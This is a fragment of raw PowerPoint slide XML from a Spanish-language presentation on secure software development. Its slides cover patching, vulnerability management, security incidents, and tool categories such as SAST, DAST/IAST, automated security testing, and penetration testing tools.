          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6085430" y="4865296"/>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Definición de roles y responsabilidades para la gestión.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectángulo 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAD8F7B3-78FB-6476-BCC8-E661A49C516C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2760191" y="3080740"/>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a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Actualización y parches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="es-ES" sz="1800" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mantener el software actualizado con los últimos parches de seguridad y actualizaciones.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" b="1">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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectángulo 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97F90888-6635-1902-759A-B221CE2475F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2760191" y="4865296"/>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Vigilancia y gestión de vulnerabilidades.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Imagen 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4EEC2D7-2EA4-A899-0574-9BB724C54D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5035" y="2135449"/>
            <a:ext cx="1061216" cy="1061216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Imagen 10" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AB1869C-8445-7348-93CB-EE836FB3384B}"/>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71946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280D2-0129-21E3-1391-969E9F6E99B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6E96E36-B2E7-8987-DC30-51FA46B90D7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B245D37-473B-E2FE-6766-97458C9280FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="251936"/>
            <a:ext cx="9500616"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Incidentes de seguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75AAA25A-EB95-48C6-769F-52A539025AF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10" name="Imagen 9" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB83EFD6-30F1-53FE-5C91-A07AC8B8CC0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429769" y="1246178"/>
            <a:ext cx="7107374" cy="1638374"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Imagen 13" descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8999A72E-51DC-B10F-E3AA-CFB5DC26A771}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6844879" y="2331097"/>
            <a:ext cx="4617241" cy="2406089"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Imagen 25" descr="Interfaz de usuario gráfica, Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A7F3634-6D94-F920-6EA2-878E44F1A87F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="396829" y="4240938"/>
            <a:ext cx="5889784" cy="1246142"/>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E512856C-B957-9320-963E-4321AE467A83}"/>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4159988"/>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1A1D4-3AE9-3755-0F3A-D8C9C17AF4A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F89D58B-AFA7-62B2-5A22-EBDB638FC5B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96CC8CA-3238-CA85-7BC7-1770CE13BD48}"/>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Herramientas y técnicas para el S-DLC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2699BF51-5BC8-93A8-5BA8-BF865CAE93A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2" name="Imagen 21" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B32A49B1-9AD1-1B02-663C-149113BA7098}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="13750" t="65000" r="73203" b="26389"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3867699" y="5498684"/>
            <a:ext cx="609600" cy="226319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectángulo 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69D3142C-F858-6A12-C988-FD04E68ABCC9}"/>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13" name="AutoShape 6" descr="Checkmarx- Static Application Security Testing | Value Added Reseller">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89B9A13E-BE6B-2DB8-9EC3-B5CA3309986D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6105026" y="29082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sz="1600">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectángulo 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E489F42E-2D4A-17A0-C544-26C915F15C2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149648" y="1454193"/>
            <a:ext cx="3158771" cy="2067864"/>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lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Análisis Estático (SAST)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Analizan el código fuente en busca de vulnerabilidades y problemas de seguridad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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15" name="Rectángulo 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{578E8D18-947E-EDFA-14D1-E8BE3513819D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149648" y="2936053"/>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16" name="Picture 8" descr="Checkmarx- Static Application Security Testing | Value Added Reseller">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F8A793D-9595-FD86-4F4B-E4BDAB2FFC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882" b="28560"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1483870" y="3085813"/>
            <a:ext cx="2230655" cy="473198"/>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0E00447B-E18B-75A9-15DE-786AFA54BCBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4525640" y="1454193"/>
            <a:ext cx="3158771" cy="2174472"/>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lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Análisis Dinámico/ Interactivo (DAST/IAST)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Prueban en tiempo de ejecución en busca de vulnerabilidades en las interfaces web.</a:t>
            </a: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19" name="Rectángulo 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E839D12B-DA9E-F3E3-E65C-EC1199D1C0E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4525640" y="2929748"/>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24" name="Imagen 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59235F85-9924-CBF4-00F4-0D2C17BD134B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="21423" b="24873"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4590024" y="2948945"/>
            <a:ext cx="1877441" cy="636460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectángulo 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F647FAB-FAA9-1AC4-2CC2-F5422427079D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2736728" y="3949163"/>
            <a:ext cx="3158771" cy="1830707"/>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b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Automatización de pruebas de seguridad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Uso de pruebas automatizadas para identificar problemas de seguridad </a:t>
            </a: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26" name="Rectángulo 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E5AE763-CE07-C4B8-B51A-341EF4AAB040}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2736728" y="5248142"/>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27" name="Imagen 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2730803A-FDB8-E70D-A63F-1FECC255B4E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3349205" y="5372875"/>
            <a:ext cx="1815318" cy="481595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectángulo 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{588126B5-40D1-3CD4-D6B9-CFC80D9C1BA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6128109" y="3981151"/>
            <a:ext cx="3158771" cy="1760458"/>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b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Herramientas de pruebas de penetración</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Herramientas que simulan ataques a una aplicación para identificar vulnerabilidades </a:t>
            </a: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29" name="Rectángulo 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2450F1BC-7D90-1C6C-CB4B-58CC3C7006C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6128109" y="5261212"/>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30" name="Picture 2" descr="Burp Suite Proxies - FineProxy.org">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ABBFCED-65EF-9088-D563-AEE640C773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1583" b="40808"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6776750" y="5436517"/>
            <a:ext cx="1815321" cy="350651"/>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6" descr="Checkmarx- Static Application Security Testing | Value Added Reseller">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C738D54C-7C8A-4538-FF19-7AFDED6DD187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9465629" y="29082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sz="1600">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectángulo 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C664ED04-5A25-05E9-FEFE-E4EFE1B2461D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7886243" y="1454193"/>
            <a:ext cx="3158771" cy="1634344"/>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ES" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Gestión de vulnerabilidades</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Gestionan las vulnerabilidades identificadas durante el desarrollo.</a:t>
            </a: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33" name="Rectángulo 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BFBD6B9-ECAE-C06A-9D36-0F946F0FEBFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7886243" y="2923439"/>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34" name="Imagen 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80585A03-8DC7-B752-71CE-882CDC2B62CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8761742" y="3019504"/>
            <a:ext cx="1407772" cy="552067"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Imagen 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2F86F7F-CDD2-013E-1094-0FFFC6AAFC68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9"/>
          <a:srcRect r="21974"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6467466" y="3009956"/>
            <a:ext cx="1172136" cy="450674"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7731246-37FE-1F77-D0C7-B56A50A19FE1}"/>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577589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C05CC-6E4A-34C0-7D92-FC375AA7188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F72FCD4-84E9-8310-6D8C-89A243F484F3}"/>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16FA21E-CAEF-7742-EDF1-56812027DD83}"/>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Herramientas de análisis de seguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B626DE8-59D9-67D3-4D7A-EBC79DDD702F}"/>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129A2A79-09CF-0942-9671-E3CAF7987759}"/>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2" name="AutoShape 6" descr="Checkmarx- Static Application Security Testing | Value Added Reseller">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3A29220-5A97-A0BA-BDBB-64991CD09D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6094854" y="29921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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 6" descr="Checkmarx- Static Application Security Testing | Value Added Reseller">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
